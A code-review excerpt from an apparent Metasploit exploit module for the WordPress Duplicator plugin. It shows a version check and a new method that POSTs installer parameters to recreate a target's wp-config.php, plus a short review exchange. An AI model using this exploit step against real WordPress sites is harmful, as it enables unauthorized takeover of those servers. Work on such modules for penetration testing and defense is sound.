modules/exploits/multi/php/wordpress_duplicator.rb

```diff
@@ -56,61 +56,65 @@ def check
     response = send_request_cgi({ 'uri' => tpath}, timeout=datastore['TIMEOUT'])
 
     unless response
-        vprint_error 'Connection failed'
-        return Exploit::CheckCode::Unknown
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
     end
 
     unless response.code == 200
-        vprint_error("Server responded with #{response.code}")
-        return Exploit::CheckCode::Safe
+      vprint_error("Server responded with #{response.code}")
+      return CheckCode::Safe
     end
 
     version = response.body.to_s.scan( /version: ([^<]*)</).last.first
     if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
-        return Exploit::CheckCode::Vulnerable
+      return CheckCode::Vulnerable
     else
-        return Exploit::CheckCode::Detected
+      return CheckCode::Detected
     end
 
   end
 
+  def create_wp_config_file
+    # 1. GET the installer.php to retrieve the archive name.
+    response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])}, timeout=datastore['TIMEOUT'])
+    if response && response.code == 200
+      archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
+      archive_name = archive_name.first.first
+      print_status("Found archive name #{archive_name}")
+      # 2. Perform the 1st step to actually create the wp-config.php file.
+      response = send_request_cgi({
+        'method' => 'POST',
+        'uri'    => normalize_uri(datastore['TARGETURI']),
+        'vars_post'   => {
+          'action_ajax' => "1",
+          'action_step' => "1",
+          'archive_name' => archive_name,
+          'archive_engine' => "ziparchive",
+          'exe_safe_mode' => "0",
+          'archive_filetime' => "current",
+          'logging' => "1"
+        }
+      }, timeout=datastore['TIMEOUT'])
+      if response && response.code == 200
+        print_status("Successfully created the wp-config.php file!")
+      else
+        print_error("The archive file #{archive_name} was probably deleted.")
+        return
+      end
+    else
+      print_error("Failed to retrieve the archive name, cannot create the wp-config.php file")
+      return
```

Comment:
Replace the two lines with a `fail_with` call.

Reply:
Done, see last commit.